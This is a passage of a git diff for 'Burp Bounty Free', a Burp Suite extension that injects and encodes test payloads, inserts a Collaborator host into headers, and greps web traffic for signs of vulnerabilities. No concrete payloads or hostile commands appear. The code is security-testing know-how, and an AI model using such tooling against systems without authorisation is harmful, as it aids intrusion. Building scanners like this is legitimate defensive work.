(headers.get(x).match.isEmpty()) { - tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n"); - } else { - tempRequest = tempRequest.replace(headers.get(x).match, replace); - } - } else { - if (replace.contains("{PAYLOAD}")) { - replace = replace.replaceAll("\\{PAYLOAD\\}", payload); - } - if (replace.contains("{BC}")) { - replace = replace.replaceAll("\\{BC\\}", bchost); - } - if (headers.get(x).match.isEmpty()) { - tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n"); - } else { - tempRequest = tempRequest.replaceAll(headers.get(x).match, replace); - } - } - - } - } - } - return helpers.stringToBytes(tempRequest); - } - - public int getContentLength(IHttpRequestResponse response) { - IResponseInfo response_info; - try { - response_info = helpers.analyzeResponse(response.getResponse()); - } catch (NullPointerException ex) { - callbacks.printError("GenericScan line 1279: " + ex.getMessage()); - return 0; - } - - int ContentLength = 0; - - for (String headers : response_info.getHeaders()) { - if (headers.toUpperCase().contains("CONTENT-LENGTH:")) { - ContentLength = Integer.parseInt(headers.split("\\s+")[1]); - } - } - return ContentLength; - } - - public boolean isResponseCode(String responsecodes, boolean negativerc, Integer responsecode) { - - if (responsecodes.isEmpty()) { - return false; - } - - List items = Arrays.asList(responsecodes.split("\\s*,\\s*")); - String code = Integer.toString(responsecode); - - if (items.contains(code)) { - if (!negativerc) { - return true; - } else { - return false; - } - } else { - if (negativerc) { - return true; - } else { - return false; - } - } - } - - public boolean isContentType(String contenttype, boolean negativect, IResponseInfo r) { - List HEADERS = r.getHeaders(); - - if (contenttype.isEmpty()) { - return false; - } - - List items = Arrays.asList(contenttype.toUpperCase().split("\\s*,\\s*")); - - for (String header : HEADERS) { - if (header.toUpperCase().contains("CONTENT-TYPE")) { - String content_type = header.substring(header.lastIndexOf(":") + 2).split(";")[0].toUpperCase(); - if (items.contains(content_type)) { - if (negativect) { - return false; - } - } else { - if (!negativect) { - return false; - } - } - } - } - return true; - } - - public List processPayload(List payloads, List encoders) { - List pay = new ArrayList(); - for (String payload : payloads) { - - for (String p : encoders) { - switch (p) { - case "URL-encode key characters": - payload = encodeKeyURL(payload); - break; - case "URL-encode all characters": - payload = encodeURL(payload); - break; - case "URL-encode all characters (Unicode)": - payload = encodeUnicodeURL(payload); - break; - case "HTML-encode key characters": - payload = encodeKeyHTML(payload); - break; - case "HTML-encode all characters": - payload = encodeHTML(payload); - break; - case "Base64-encode": - payload = helpers.base64Encode(payload); - default: - break; - } - } - pay.add(payload); - } - - return pay; - } - - public static String encodeURL(String s) { - StringBuffer out = new StringBuffer(); - for (int i = 0; i < s.length(); i++) { - char c = s.charAt(i); - out.append("%" + Integer.toHexString((int) c)); - } - return out.toString(); - } - - public static String encodeUnicodeURL(String s) { - StringBuffer out = new StringBuffer(); - for (int i = 0; i < s.length(); i++) { - char c = s.charAt(i); - out.append("%u00" + Integer.toHexString((int) c)); - } - return out.toString(); - } - - public static String encodeHTML(String s) { - StringBuffer out = new StringBuffer(); - for (int i = 0; i < s.length(); i++) { - char c = s.charAt(i); - out.append("&#x" + Integer.toHexString((int) c) + ";"); - } - return out.toString(); - } - - public static String encodeKeyHTML(String s) { - StringBuffer out = new StringBuffer(); - String key = "\\<\\(\\[\\\\\\^\\-\\=\\$\\!\\|\\]\\)\\?\\*\\+\\.\\>]\\&\\%\\:\\@ "; - for (int i = 0; i < s.length(); i++) { - char c = s.charAt(i); - if (key.contains(s.substring(i, i + 1))) { - out.append("&#x" + Integer.toHexString((int) c) + ";"); - } else { - out.append(c); - } - } - return out.toString(); - } - - public static String encodeKeyURL(String s) { - StringBuffer out = new StringBuffer(); - String key = "\\<\\(\\[\\\\\\^\\-\\=\\$\\!\\|\\]\\)\\?\\*\\+\\.\\>]\\&\\%\\:\\@ "; - for (int i = 0; i < s.length(); i++) { - char c = s.charAt(i); - if (key.contains(s.substring(i, i + 1))) { - out.append("%" + Integer.toHexString((int) c)); - } else { - out.append(c); - } - } - return out.toString(); - } - - public static String encodeTheseURL(String s, String characters) { - StringBuffer out = new StringBuffer(); - for (int i = 0; i < s.length(); i++) { - char c = s.charAt(i); - if (characters.indexOf(c) >= 0) { - out.append("%" + Integer.toHexString((int) c)); - } else { - out.append(c); - } - } - return out.toString(); - } -} diff --git a/src/GrepMatch.java b/src/GrepMatch.java index 3d57195..cb978f8 100755 --- a/src/GrepMatch.java +++ b/src/GrepMatch.java @@ -13,12 +13,13 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpExtenderCallbacks; import burp.IExtensionHelpers; import burp.IHttpRequestResponse; import burp.IResponseInfo; +import burp.IRequestInfo; import burp.IScanIssue; import burp.IScannerInsertionPoint; import java.util.ArrayList; @@ -88,7 +89,7 @@ public IScanIssue getResponseMatches(IHttpRequestResponse requestResponse, Strin m = p.matcher(responseString); } } catch (PatternSyntaxException pse) { - callbacks.printError("Grep Match line 93 Incorrect regex: " + pse.getPattern()); + System.out.println("GrepMatch line 93 Incorrect regex: " + pse.getPattern()); return null; } @@ -111,7 +112,12 @@ public IScanIssue getResponseMatches(IHttpRequestResponse requestResponse, Strin } } else { + int end = 0; while (m.find(beginAt)) { + end = end + 1; + if (end == 30) { + break; + } responseMarkers.add(new int[]{m.start(), m.end()}); matches = matches + m.group().toLowerCase() + "
"; beginAt = m.end(); @@ -137,7 +143,12 @@ public IScanIssue getResponseMatches(IHttpRequestResponse requestResponse, Strin if (!payload.equals("")) { int start = 0; byte[] match = helpers.stringToBytes(payload); + int end = 0; while (start < request.length) { + end = end + 1; + if (end == 30) { + break; + } start = helpers.indexOf(request, match, false, start, request.length); if (start == -1) { break; @@ -155,8 +166,12 @@ public IScanIssue getResponseMatches(IHttpRequestResponse requestResponse, Strin } else { byte[] match = helpers.stringToBytes(grep); - + int end = 0; while (beginAt < response.length) { + end = end + 1; + if (end == 30) { + break; + } beginAt = helpers.indexOf(response, match, false, beginAt, response.length); if (beginAt == -1) { break; @@ -183,124 +198,235 @@ public int compare(int[] o1, int[] o2) { } }); + Collections.sort(requestMarkers, new Comparator() { + private static final int INDEX = 0; + + @Override + public int compare(int[] o1, int[] o2) { + return Integer.compare(o1[INDEX], o2[INDEX]); + } + }); + + String results_req = ""; + String results_resp = ""; + for (int[] res : responseMarkers) { + results_resp = results_resp + "
" + helpers.urlDecode(helpers.bytesToString(requestResponse.getResponse()).substring(res[0], res[1])); + } + + for (int[] req : requestMarkers) { + results_req = results_req + "
" + helpers.urlDecode(helpers.bytesToString(requestResponse.getRequest()).substring(req[0], req[1])); + } + return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, responseMarkers) - }, - "BurpBounty - " + issuename, issuedetail - .replace( - "", helpers.urlEncode(payload)), - issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground); + }, "BurpBounty - " + issuename, issuedetail.replace("", results_req).replace("", results_resp), issueseverity.replace("", results_req).replace("", results_resp), issueconfidence.replace("", results_req).replace("", results_resp), remediationdetail.replace("", results_req).replace("", results_resp), issuebackground.replace("", results_req).replace("", results_resp), remediationbackground.replace("", results_req).replace("", results_resp)); } public Object[] getRequestMatches(IHttpRequestResponse requestResponse, List greps, String issuename, String issuedetail, String issuebackground, - String remediationdetail, String remediationbackground, int matchtype, String issueseverity, String issueconfidence, Boolean casesensitive, Boolean notresponse) { + String remediationdetail, String remediationbackground, int matchtype, String issueseverity, String issueconfidence, Boolean casesensitive, Boolean notresponse, Boolean scanas, int scantype) { String data = ""; Pattern p; Matcher m; byte[] request = requestResponse.getRequest(); List requestMarkers = new ArrayList(); + IRequestInfo requestInfo = helpers.analyzeRequest(requestResponse.getRequest()); List insertionPoints = new ArrayList(); + int matches = 0; + List requestMarkersInsertionPoints = new ArrayList(); + Boolean isInsertionPoint = true; for (String grep : greps) { - String[] tokens = grep.split(",",2); - String value = tokens[1]; + String[] tokens = grep.split(",", 3); + String insertionPoint = tokens[0]; + String where = tokens[1]; + String value = tokens[2]; grep = value; - Boolean vuln = false; if (casesensitive && matchtype == 1) { - - data = helpers.bytesToString(requestResponse.getRequest()); - + switch (insertionPoint) { + case "All Request": + data = helpers.bytesToString(requestResponse.getRequest()); + isInsertionPoint = false; + break; + default: + break; + } } else if (matchtype == 1) { - - data = helpers.bytesToString(requestResponse.getRequest()).toUpperCase(); - grep = grep.toUpperCase(); - + switch (insertionPoint) { + case "All Request": + data = helpers.bytesToString(requestResponse.getRequest()).toUpperCase(); + grep = grep.toUpperCase(); + isInsertionPoint = false; + break; + default: + break; + } } else if (matchtype == 2) { Matcher matcher; try { p = Pattern.compile(grep, Pattern.CASE_INSENSITIVE); } catch (PatternSyntaxException pse) { - callbacks.printError("Grep Match line 251 Incorrect regex: " + pse.getPattern()); + System.out.println("Grep Match line 251 Incorrect regex: " + pse.getPattern()); return null; } - data = helpers.bytesToString(requestResponse.getRequest()); - matcher = p.matcher(data); - - } - - if (matchtype == 2) { - //Start regex grep - int beginAt = 0; - try { - p = Pattern.compile(grep, Pattern.CASE_INSENSITIVE); - m = p.matcher(helpers.bytesToString(requestResponse.getRequest())); - } catch (PatternSyntaxException pse) { - callbacks.printError("Grep Match line 251 Incorrect regex: " + pse.getPattern()); - return null; + switch (insertionPoint) { + case "All Request": + matcher = p.matcher(helpers.bytesToString(requestResponse.getRequest())); + if (matcher.find()) { + data = helpers.bytesToString(requestResponse.getRequest()); + } + isInsertionPoint = false; + break; + default: + break; } + } - if (m.find(beginAt)) { - if (notresponse) { - return null; - } else { - while (m.find(beginAt)) { - requestMarkers.add(new int[]{m.start(), m.end()}); - beginAt = m.end(); - vuln = true; + try { + if (!isInsertionPoint) { + if (matchtype == 2) { + //Start regex grep + int beginAt = 0; + if (!data.isEmpty()) { + try { + p = Pattern.compile(grep, Pattern.CASE_INSENSITIVE); + m = p.matcher(data); + } catch (Exception e) { + System.out.println("Grep Match line 251 Incorrect regex: " + e.getMessage()); + return null; + } + int end = 0; + while (m.find(beginAt)) { + end = end + 1; + if (end == 30) { + break; + } + if (notresponse) { + return null; + } else { + matches = matches + 1; + requestMarkers.add(new int[]{m.start(), m.end()}); + beginAt = m.end(); + } + } } - - if (!vuln) { - return null; + //End regex grep + //Start Simple String, payload in response and payload without encode + } else { + int beginAt = 0; + + if (data.contains(grep.toUpperCase())) { + + if (notresponse) { + return null; + } else { + matches = matches + 1; + //if (grep.length() >= 3) { + byte[] match = helpers.stringToBytes(grep); + int end = 1; + while (beginAt < request.length) { + end = end + 1; + if (end == 30) { + break; + } + beginAt = helpers.indexOf(request, match, false, beginAt, request.length); + if (beginAt == -1) { + break; + } + + requestMarkers.add(new int[]{beginAt, beginAt + match.length}); + beginAt += match.length; + + } + //} + } } + //End Simple String, payload and payload without encode } } else { - return null; - } - //End regex grep - //Start Simple String, payload in response and payload without encode - } else { - int beginAt = 0; - - if (data.contains(grep.toUpperCase())) { - if (notresponse) { - return null; - } else { - byte[] match = helpers.stringToBytes(grep); - while (beginAt < request.length) { - beginAt = helpers.indexOf(request, match, false, beginAt, request.length); - if (beginAt == -1) { - break; + if (matchtype == 2) { + //Start regex grep + int beginAt = 0; + String[] match = data.split(",", 3); + for (String single : match) { + if (!single.isEmpty()) { + try { + p = Pattern.compile(grep, Pattern.CASE_INSENSITIVE); + m = p.matcher(single); + } catch (PatternSyntaxException pse) { + System.out.println("Grep Match line 251 Incorrect regex: " + pse.getPattern()); + return null; + } + + if (m.find(beginAt)) { + if (notresponse) { + return null; + } else { + matches = matches + 1; + requestMarkers.addAll(requestMarkersInsertionPoints); + } + } } - requestMarkers.add(new int[]{beginAt, beginAt + match.length}); - beginAt += match.length; - vuln = true; } + } else { + if (data.contains(grep.toUpperCase())) { - if (!vuln) { - return null; + if (notresponse) { + return null; + } else { + matches = matches + 1; + requestMarkers.addAll(requestMarkersInsertionPoints); + } } } - } else { - return null; } - //End Simple String, payload and payload without encode + } catch (Exception e) { + System.out.println("Grep Match line 898: " + e.getMessage()); + return null; } } - Collections.sort(requestMarkers, new Comparator() { - private static final int INDEX = 0; + try { + if (matches >= greps.size()) { + Collections.sort(requestMarkers, new Comparator() { + private static final int INDEX = 0; - @Override - public int compare(int[] o1, int[] o2) { - return Integer.compare(o1[INDEX], o2[INDEX]); - } - }); + @Override + public int compare(int[] o1, int[] o2) { + return Integer.compare(o1[INDEX], o2[INDEX]); + } + }); - return new Object[]{new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), - new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)}, - "BurpBounty - " + issuename, issuedetail, issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground), insertionPoints}; + List requestMarkers_noduplicates = new ArrayList(); + if (requestMarkers.size() == 1) { + requestMarkers_noduplicates = requestMarkers; + } else { + for (int i = 0; i <= requestMarkers.size() - 1; i++) { + if (i == requestMarkers.size() - 1) { + requestMarkers_noduplicates.add(requestMarkers.get(i)); + } else if (requestMarkers.get(i)[0] != requestMarkers.get(i + 1)[0]) { + requestMarkers_noduplicates.add(requestMarkers.get(i)); + } + } + } + + String results_req = ""; + for (int[] req : requestMarkers) { + results_req = results_req + "
- " + helpers.urlDecode(helpers.bytesToString(requestResponse.getRequest()).substring(req[0], req[1]).replace("\"", "").replace("'", "")); + } + + return new Object[]{new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), + new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers_noduplicates, null)}, + "BurpBounty - " + issuename, "It may be that the detected parameter is highlighted in red more times through the request. " + + "This is because of the marking system the burpsuite uses.

" + issuedetail.replace("", results_req), issueseverity.replace("", results_req), issueconfidence.replace("", results_req), remediationdetail.replace("", results_req), issuebackground.replace("", results_req), remediationbackground.replace("", results_req)), insertionPoints}; + } else { + return null; + } + } catch (Exception e) { + System.out.println("Grep Match line 898: " + e.getMessage()); + return null; + } } } diff --git a/src/Headers.java b/src/Headers.java index 43dd2dc..6e5396d 100755 --- a/src/Headers.java +++ b/src/Headers.java @@ -13,14 +13,14 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; public class Headers { - String type; - String match; - String replace; - String regex; + String type = ""; + String match = ""; + String replace = ""; + String regex = ""; Headers(String type, String match, String replace, String regex) { this.type = type; diff --git a/src/NewTag.java b/src/NewTag.java index 6532c5b..d2a27fb 100755 --- a/src/NewTag.java +++ b/src/NewTag.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; public class NewTag extends javax.swing.JPanel { diff --git a/src/PassiveRequestScanner.java b/src/PassiveRequestScanner.java new file mode 100755 index 0000000..a4b6709 --- /dev/null +++ b/src/PassiveRequestScanner.java @@ -0,0 +1,178 @@ +/* +Copyright 2018 Eduardo Garcia Melia + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. + */ +package burpbountyfree; + +import burp.IBurpExtenderCallbacks; +import burp.IExtensionHelpers; +import burp.IHttpRequestResponse; +import burp.IRequestInfo; +import burp.IScanIssue; +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import java.util.ArrayList; +import java.util.List; + +/** + * + * @author wagiro + */ +public class PassiveRequestScanner { + + private IBurpExtenderCallbacks callbacks; + private IExtensionHelpers helpers; + + JsonArray active_profiles; + BurpBountyExtension bbe; + Gson gson; + CollaboratorData burpCollaboratorData; + BurpBountyGui bbg; + JsonArray allprofiles; + JsonArray activeprofiles; + Integer redirtype; + Integer smartscandelay; + ActiveScanner active_scanner; + Utils utils; + String issuename; + String issuedetail; + String issuebackground; + String remediationdetail; + String remediationbackground; + int matchtype; + String issueseverity; + String issueconfidence; + boolean notresponse; + boolean casesensitive; + List greps; + ProfilesProperties profile_property; + String urlextension; + Boolean isurlextension; + Boolean NegativeUrlExtension; + Boolean scanas; + int scantype; + GrepMatch gm; + + public PassiveRequestScanner(BurpBountyExtension bbe, IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData, JsonArray allprofiles, JsonArray activeprofiles, BurpBountyGui bbg) { + + this.callbacks = callbacks; + helpers = callbacks.getHelpers(); + this.burpCollaboratorData = burpCollaboratorData; + gson = new Gson(); + this.allprofiles = allprofiles; + this.activeprofiles = activeprofiles; + this.bbe = bbe; + this.bbg = bbg; + gm = new GrepMatch(callbacks); + utils = new Utils(bbe, callbacks, burpCollaboratorData, allprofiles, bbg); + } + + public void runReqPScan(IHttpRequestResponse baseRequestResponse, JsonArray passivereqprofiles, JsonArray rules, List urls, Boolean passive) { + + try { + if (baseRequestResponse.getRequest() == null) { + return; + } + + for (int i = 0; i < passivereqprofiles.size(); i++) { + + int grep_index = 0; + ArrayList> greps_final = new ArrayList<>(); + Object idata = passivereqprofiles.get(i); + profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); + + setProfilesValues(profile_property); + + Boolean isduplicated = utils.checkDuplicatedPassive(baseRequestResponse, issuename); + + if (!isduplicated || passive) { + + IRequestInfo requestInfo = helpers.analyzeRequest(baseRequestResponse); + + greps_final.add(new ArrayList()); + + for (String grep : greps) { + String[] tokens = grep.split(",", 5); + + if (tokens[0].equals("true")) { + if (tokens[1].equals("And") || tokens[1].equals("")) { + if (!tokens[4].equals("")) { + greps_final.get(grep_index).add(tokens[2] + "," + tokens[3] + "," + tokens[4]); + } + } else { + if (!tokens[4].equals("")) { + if (!greps_final.get(0).isEmpty()) { + greps_final.add(new ArrayList()); + grep_index = grep_index + 1; + greps_final.get(grep_index).add(tokens[2] + "," + tokens[3] + "," + tokens[4]); + } else { + greps_final.get(grep_index).add(tokens[2] + "," + tokens[3] + "," + tokens[4]); + } + } + } + } + } + + for (int x = 0; x <= grep_index; x++) { + Object[] matches = null; + try { + + if (!greps_final.get(x).isEmpty()) { + matches = gm.getRequestMatches(baseRequestResponse, greps_final.get(x), issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, matchtype, + issueseverity, issueconfidence, casesensitive, notresponse, scanas, scantype); + } + + if (matches != null) { + callbacks.addScanIssue((IScanIssue) matches[0]); + } + } catch (Exception e) { + + System.out.println("PassiveRequestScanner line 153: " + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + System.out.println(issuename); + continue; + } + } + } + } + } catch (Exception e) { + System.out.println("PassiveRequestScanner line 164: " + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + + } + + public void setProfilesValues(ProfilesProperties profile_property) { + greps = profile_property.getGreps(); + issuename = profile_property.getIssueName(); + issueseverity = profile_property.getIssueSeverity(); + issueconfidence = profile_property.getIssueConfidence(); + issuedetail = profile_property.getIssueDetail(); + issuebackground = profile_property.getIssueBackground(); + remediationdetail = profile_property.getRemediationDetail(); + remediationbackground = profile_property.getRemediationBackground(); + matchtype = profile_property.getMatchType(); + notresponse = profile_property.getNotResponse(); + casesensitive = profile_property.getCaseSensitive(); + isurlextension = profile_property.getIsURLExtension(); + urlextension = profile_property.getURLExtension(); + NegativeUrlExtension = profile_property.getNegativeURLExtension(); + scantype = profile_property.getScanType(); + scanas = profile_property.getScanAs(); + } +} diff --git a/src/PassiveResponseScanner.java b/src/PassiveResponseScanner.java new file mode 100755 index 0000000..cb288f8 --- /dev/null +++ b/src/PassiveResponseScanner.java @@ -0,0 +1,220 @@ +/* +Copyright 2018 Eduardo Garcia Melia + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. + */ +package burpbountyfree; + +import burp.IBurpExtenderCallbacks; +import burp.IExtensionHelpers; +import burp.IHttpRequestResponse; +import burp.IParameter; +import burp.IRequestInfo; +import burp.IResponseInfo; +import burp.IScanIssue; +import burp.IScannerInsertionPoint; +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import java.util.ArrayList; +import java.util.List; + +/** + * + * @author wagiro + */ +public class PassiveResponseScanner { + + private IBurpExtenderCallbacks callbacks; + private IExtensionHelpers helpers; + + JsonArray active_profiles; + BurpBountyExtension bbe; + Gson gson; + CollaboratorData burpCollaboratorData; + BurpBountyGui bbg; + JsonArray allprofiles; + Integer redirtype; + Integer smartscandelay; + String issuename; + String issuedetail; + String issuebackground; + String remediationdetail; + String remediationbackground; + int matchtype; + int scope; + String issueseverity; + String issueconfidence; + boolean excludeHTTP; + boolean onlyHTTP; + boolean notresponse; + boolean iscontenttype; + boolean isresponsecode; + boolean negativect; + boolean negativerc; + String contenttype; + String responsecode; + boolean casesensitive; + List greps; + ProfilesProperties profile_property; + String urlextension; + Boolean isurlextension; + Boolean NegativeUrlExtension; + ActiveScanner active_scanner; + Utils utils; + JsonArray activeprofiles; + GrepMatch gm; + + public PassiveResponseScanner(BurpBountyExtension bbe, IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData, JsonArray allprofiles, JsonArray activeprofiles, BurpBountyGui bbg) { + + this.callbacks = callbacks; + helpers = callbacks.getHelpers(); + this.burpCollaboratorData = burpCollaboratorData; + gson = new Gson(); + this.allprofiles = allprofiles; + this.activeprofiles = activeprofiles; + this.bbe = bbe; + this.bbg = bbg; + utils = new Utils(bbe, callbacks, burpCollaboratorData, allprofiles, bbg); + gm = new GrepMatch(callbacks); + } + + public void runResPScan(IHttpRequestResponse baseRequestResponse, JsonArray passiveresprofiles, JsonArray rules, List urls, Boolean passive) { + try { + if (baseRequestResponse.getResponse() == null) { + return; + } + + for (int i = 0; i < passiveresprofiles.size(); i++) { + IResponseInfo r; + int grep_index = 0; + ArrayList> greps_final = new ArrayList<>(); + + Object idata = passiveresprofiles.get(i); + profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); + + setProfilesValues(profile_property); + + try { + r = helpers.analyzeResponse(baseRequestResponse.getResponse()); + } catch (NullPointerException e) { + System.out.println("PassiveResponseScanner line 616: " + e.getMessage()); + return; + } + + Boolean isduplicated = utils.checkDuplicatedPassiveResponse(baseRequestResponse, issuename); + + if (!isduplicated || passive) { + + Integer responseCode = new Integer(r.getStatusCode()); + IRequestInfo requestInfo = helpers.analyzeRequest(baseRequestResponse); + + if ((isresponsecode && !utils.isResponseCode(responsecode, negativerc, responseCode)) || (iscontenttype && !utils.isContentType(contenttype, negativect, r))) { + continue; + } + + greps_final.add(new ArrayList()); + + for (String grep : greps) { + String[] tokens; + + try { + tokens = grep.split(",", 3); + } catch (ArrayIndexOutOfBoundsException e) { + System.out.println("PassiveResponseScanner line 140: " + e.getMessage()); + continue; + } + + if (tokens[0].equals("true")) { + if (tokens[1].equals("And") || tokens[1].equals("")) { + if (!tokens[2].equals("")) { + greps_final.get(grep_index).add(tokens[2]); + } + } else { + if (!tokens[2].equals("")) { + if (!greps_final.get(0).isEmpty()) { + greps_final.add(new ArrayList()); + grep_index = grep_index + 1; + greps_final.get(grep_index).add(tokens[2]); + } else { + greps_final.get(grep_index).add(tokens[2]); + } + } + } + } + } + + for (int x = 0; x <= grep_index; x++) { + IScanIssue matches = null; + if (!greps_final.get(x).isEmpty()) { + + matches = gm.getResponseMatches(baseRequestResponse, "", greps_final.get(x), issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, "", matchtype, + issueseverity, issueconfidence, notresponse, casesensitive, false, excludeHTTP, onlyHTTP); + } + + if (matches != null) { + if (scope != 1) {//porperty.equals("All Matches")) { + callbacks.addScanIssue(matches); + } else { + Boolean isUrlScanned = true; + for (String url[] : urls) { + if (url[1].contains(baseRequestResponse.getHttpService().getHost())) { + if (url[0].contains(issuename)) { + isUrlScanned = false; + } + } + } + + if (isUrlScanned) { + callbacks.addScanIssue(matches); + urls.add(new String[]{issuename, baseRequestResponse.getHttpService().getHost()}); + } + } + } + } + } + } + } catch (Exception e) { + System.out.println("PassiveResponseScanner line 210: " + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + } + + public void setProfilesValues(ProfilesProperties profile_property) { + greps = profile_property.getGreps(); + issuename = profile_property.getIssueName(); + issueseverity = profile_property.getIssueSeverity(); + issueconfidence = profile_property.getIssueConfidence(); + issuedetail = profile_property.getIssueDetail(); + issuebackground = profile_property.getIssueBackground(); + remediationdetail = profile_property.getRemediationDetail(); + remediationbackground = profile_property.getRemediationBackground(); + matchtype = profile_property.getMatchType(); + scope = profile_property.getScope(); + notresponse = profile_property.getNotResponse(); + casesensitive = profile_property.getCaseSensitive(); + iscontenttype = profile_property.getIsContentType(); + isresponsecode = profile_property.getIsResponseCode(); + contenttype = profile_property.getContentType(); + responsecode = profile_property.getResponseCode(); + excludeHTTP = profile_property.getExcludeHTTP(); + onlyHTTP = profile_property.getOnlyHTTP(); + negativect = profile_property.getNegativeCT(); + negativerc = profile_property.getNegativeRC(); + isurlextension = profile_property.getIsURLExtension(); + urlextension = profile_property.getURLExtension(); + NegativeUrlExtension = profile_property.getNegativeURLExtension(); + } + +} diff --git a/src/ProfilesManager.java b/src/ProfilesManager.java new file mode 100755 index 0000000..1a950b2 --- /dev/null +++ b/src/ProfilesManager.java @@ -0,0 +1,1501 @@ +/* +Copyright 2018 Eduardo Garcia Melia + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. + */ +package burpbountyfree; + +import com.google.gson.Gson; +import com.google.gson.GsonBuilder; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.reflect.TypeToken; +import java.io.BufferedReader; +import java.io.File; +import java.io.FileNotFoundException; +import java.io.FileOutputStream; +import java.io.FileReader; +import java.io.FileWriter; +import java.io.IOException; +import java.io.OutputStreamWriter; +import java.util.ArrayList; +import java.util.List; +import javax.swing.DefaultListModel; + +/** + * + * @author wagiro + */ +public class ProfilesManager { + + private String name; + private String issuename; + private String issuedetail; + private String issuebackground; + private String remediationdetail; + private String remediationbackground; + private String charstourlencode; + private int matchtype; + private int scope; + private String issueseverity; + private String issueconfidence; + private String responsecode; + private String contenttype; + private boolean negativect; + private boolean negativerc; + private boolean notresponse; + private boolean casesensitive; + private boolean excludeHTTP; + private boolean onlyHTTP; + private boolean urlencode; + private boolean isresponsecode; + private boolean iscontenttype; + private String urlextension; + private boolean isurlextension; + private boolean NegativeUrlExtension; + private boolean Scanas; + private int Scantype; + private int redirtype; + private int maxRedir; + private int payloadPosition; + private String payloadsfile; + private String grepsfile; + private String timeOut1; + private String timeOut2; + private String contentLength; + private String httpResponseCode; + private String author; + private String profiles_directory; + private List headers; + private List variationAttributes; + private List insertionPointType; + + public ProfilesManager(String profiles_directory) { + this.profiles_directory = profiles_directory; + + name = ""; + issuename = ""; + issuedetail = ""; + issuebackground = ""; + remediationdetail = ""; + remediationbackground = ""; + charstourlencode = ""; + matchtype = 0; + scope = 0; + issueseverity = ""; + issueconfidence = ""; + responsecode = ""; + contenttype = ""; + httpResponseCode = ""; + negativect = false; + negativerc = false; + notresponse = false; + casesensitive = false; + excludeHTTP = false; + onlyHTTP = false; + urlencode = false; + isresponsecode = false; + iscontenttype = false; + redirtype = 0; + maxRedir = 0; + payloadPosition = 0; + Scantype = 0; + payloadsfile = ""; + grepsfile = ""; + timeOut1 = ""; + timeOut2 = ""; + contentLength = ""; + author = ""; + urlextension = ""; + isurlextension = false; + NegativeUrlExtension = false; + Scanas = false; + headers = new ArrayList(); + variationAttributes = new ArrayList(); + insertionPointType = new ArrayList(); + } + + public void setActiveAttackValues(String profile_name, JsonArray activeprofiles, ActiveProfile profile) { + //Set Attack values when select from main combobox + try { + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + + JsonArray json = activeprofiles; + ProfilesProperties profile_property = new ProfilesProperties(); + + if (json != null) { + for (JsonElement pa : json) { + JsonObject bbObj = pa.getAsJsonObject(); + if (bbObj.get("ProfileName").getAsString().equals(profile_name)) { + profile_property = gson.fromJson(bbObj.toString(), ProfilesProperties.class + ); + } + + } + } + + name = profile_property.getProfileName(); + casesensitive = profile_property.getCaseSensitive(); + notresponse = profile_property.getNotResponse(); + matchtype = profile_property.getMatchType(); + issuename = profile_property.getIssueName(); + issueseverity = profile_property.getIssueSeverity(); + issueconfidence = profile_property.getIssueConfidence(); + issuedetail = profile_property.getIssueDetail(); + issuebackground = profile_property.getIssueBackground(); + remediationdetail = profile_property.getRemediationDetail(); + remediationbackground = profile_property.getRemediationBackground(); + urlencode = profile_property.getUrlEncode(); + charstourlencode = profile_property.getCharsToUrlEncode(); + iscontenttype = profile_property.getIsContentType(); + isresponsecode = profile_property.getIsResponseCode(); + contenttype = profile_property.getContentType(); + responsecode = profile_property.getResponseCode(); + excludeHTTP = profile_property.getExcludeHTTP(); + onlyHTTP = profile_property.getOnlyHTTP(); + negativect = profile_property.getNegativeCT(); + negativerc = profile_property.getNegativeRC(); + isurlextension = 